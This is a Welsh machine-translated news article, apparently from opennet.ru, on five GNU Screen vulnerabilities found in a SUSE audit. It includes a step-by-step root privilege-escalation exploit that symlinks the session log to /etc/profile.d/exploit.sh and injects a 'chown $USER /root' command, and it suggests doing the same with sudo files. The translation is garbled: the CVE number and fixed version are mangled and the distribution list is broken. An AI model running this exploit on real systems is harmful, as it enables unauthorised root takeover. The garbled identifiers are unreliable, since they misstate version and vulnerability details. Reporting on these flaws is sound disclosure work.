Mae bregusrwydd yn sgrin GNU yn caniatáu gweithredu cod gyda breintiau gwraidd

Mae pum gwendid wedi'u nodi yn rheolwr ffenestri consol sgrin GNU (amlblecsydd terfynell), sy'n darparu rhyngwyneb aml-ffenestr yn y consol. Mae'r broblem fwyaf peryglus (CVE-5-2025) yn caniatáu i freintiau gwraidd gael eu hennill ar y system. Mae'r ateb wedi'i gynnwys yn y fersiwn sgrin 23395 heddiw.

Dim ond y gangen sgrin 5.0.0, sy'n dod gyda Fedora, y mae'r bregusrwydd CVE-2025-23395 yn effeithio arni. Linux, Arch Linux, NetBSD, OpenBSD ac Alpine. YN Debian, UbuntuMae RHEL (EPEL 9), Gentoo, FreeBSD, SUSE/openSUSE, ac OpenWrt yn parhau i gludo'r gangen screen 4.x. Mae manteisio ar y bregusrwydd yn bosibl ar systemau sy'n gosod y ffeil weithredadwy screen gyda'r faner gwraidd setuid, fel Arch. Linux a NetBSD. Yn Fedora, mae'r cyfleustodau wedi'u gosod gyda'r faner setgid i roi caniatâd i'r grŵp sgrin, gan ganiatáu i socedi gael eu gosod yn y cyfeiriadur system /run/screen, gan gyfyngu ar y potensial ar gyfer ymosodiadau gwrthod gwasanaeth.

Mae'r bregusrwydd yn cael ei achosi gan y ffaith, pan gaiff ei redeg gyda breintiau gwraidd, bod y swyddogaeth logfile_reopen() yn cael ei gweithredu cyn i'r breintiau gael eu gollwng, ond mae'n prosesu data yng nghyd-destun cyfeiriaduron sgrin rhedeg y defnyddiwr di-freintiau cyfredol. Mae'n werth nodi bod agoriad cychwynnol y log yn cael ei berfformio gyda'r ailosodiad breintiau cywir, ond wrth ailagor y ffeil gyda'r log, nid yw'r ailosodiad breintiau yn cael ei berfformio.

Drwy drin y modd cofnodi cynnwys sesiwn, gall y defnyddiwr ysgrifennu data i ffeil gyda hawliau gwraidd, tra gellir cadw'r ffeil ei hun yng nghyfeiriadur cartref y defnyddiwr. Mae'r ymosodiad yn cynnwys dileu'r ffeil log a grëwyd a'i disodli â dolen symbolaidd sy'n pwyntio at unrhyw ffeil yn y system. Os yw'r ffeil eisoes yn bodoli, bydd y data sy'n cynnwys cynnwys y sgrin yn y sesiwn sgrin yn cael ei atodi ati heb newid y perchennog. Os nad yw'r ffeil yn bodoli, bydd yn cael ei chreu gyda chaniatâd 0644, gwraidd y perchennog a grŵp fel y defnyddiwr cyfredol.

Yr algorithm ymosod sy'n creu'r ffeil /etc/profile.d/exploit.sh gyda'r gorchymyn "chown $USER /root":

  • Creu sesiwn sgrin gyda logio wedi'i alluogi $ screen -Logfile $HOME/screen.log
  • Pwyswch y cyfuniad allweddi Ctrl-aH i alluogi logio.
  • Dileu'r ffeil log a'i disodli â dolen symbolaidd, a fydd yn creu'r ffeil /etc/profile.d/exploit.sh $ rm $HOME/screen.log; ln -s /etc/profile.d/exploit.sh $HOME/screen.log
  • Dychwelwch i'r sesiwn sgrin ac allbwnwch ddata i'r sgrin a fydd yn cael ei ysgrifennu i'r ffeil log. $ echo -e "\nchown $USER /root;"
  • Unwaith y bydd y gwreiddyn go iawn yn cysylltu â'r system, bydd y sgript /etc/profile.d/exploit.sh yn rhedeg, a fydd yn newid perchennog y cyfeiriadur /root. $ ls -lhd /root drwxr-x— 5 gwreiddyn defnyddiwr 4.0K 30 Rhagfyr 2020.
  • Yn yr un modd, gallwch greu ffeiliau ffurfweddu sudo neu ychwanegu gorchmynion at ddiwedd sgriptiau system.

Bregusrwyddau llai peryglus yn y sgrin:

  • CVE-2025-46802 - Herwgipio dyfais TTY mewn sesiynau aml-ddefnyddiwr (gall defnyddiwr gyflawni caniatâd crw-rw-rw- ar gyfer dyfais /dev/pts/1). Mae'r broblem yn ymddangos yng nghanghenau sgrin 4.x a 5.x.
  • CVE-2025-46803 - Gosod caniatâd diofyn i 0622 ar ddyfais PTY, gan ganiatáu i unrhyw ddefnyddiwr ysgrifennu. Dim ond yn y gangen sgrin 5.0 y mae'r broblem yn ymddangos.
  • CVE-2025-46804 - gollyngiad gwybodaeth am bresenoldeb ffeiliau a chyfeiriaduron mewn cyfeiriaduron caeedig (wrth nodi cyfeiriadur ar gyfer socedi gan ddefnyddio'r newidyn amgylcheddol SCREENDIR, mae'r cyfleustodau'n cynhyrchu testunau gwall gwahanol sy'n caniatáu i un wybod am bresenoldeb ffeiliau a chyfeiriaduron gyda'r enw hwn). Mae'r broblem yn ymddangos yng nghanghenau sgrin 4.x a 5.x.
  • CVE-2025-46805 - Mae cyflwr ras yn bodoli wrth anfon signalau SIGCONT a SIGHUP, gan arwain at wrthod gwasanaeth. Mae'r broblem yn ymddangos yng nghanghenau sgrin 4.x a 5.x.
  • Defnydd anghywir o'r ffwythiant strncpy (disodli strcpy â strncpy heb ystyried y gwahaniaeth wrth drin nodau gwag "\0"), gan arwain at ddamwain wrth weithredu gorchmynion wedi'u fformatio'n arbennig. Dim ond yn y gangen sgrin 5.0 y mae'r broblem yn ymddangos.

Darganfuwyd y gwendidau yn ystod archwiliad o god sgrin GNU a gynhaliwyd gan dîm diogelwch dosbarthu SUSE. LinuxHysbyswyd datblygwyr sgrin am y bregusrwydd ar Chwefror 7, ond ni allent baratoi clytiau ar gyfer yr holl wendidau o fewn y 90 diwrnod a neilltuwyd, gan orfodi staff SUSE i ddatblygu rhai clytiau eu hunain. Yn ôl yr ymchwilwyr a gynhaliodd yr archwiliad, nid oes gan gynhalwyr presennol GNU Screen ddigon o gyfarwyddyd â sylfaen god y prosiect ac ni allant ddeall y materion diogelwch a nodwyd yn llawn.

Ffynhonnell: opennet.ru

Prynu gwesteio dibynadwy ar gyfer gwefannau sydd â diogelwch DDoS, gweinyddwyr VPS VDS 🔥 Prynu cynnal gwefannau dibynadwy gyda diogelwch DDoS, gweinyddion VPS VDS | ProHoster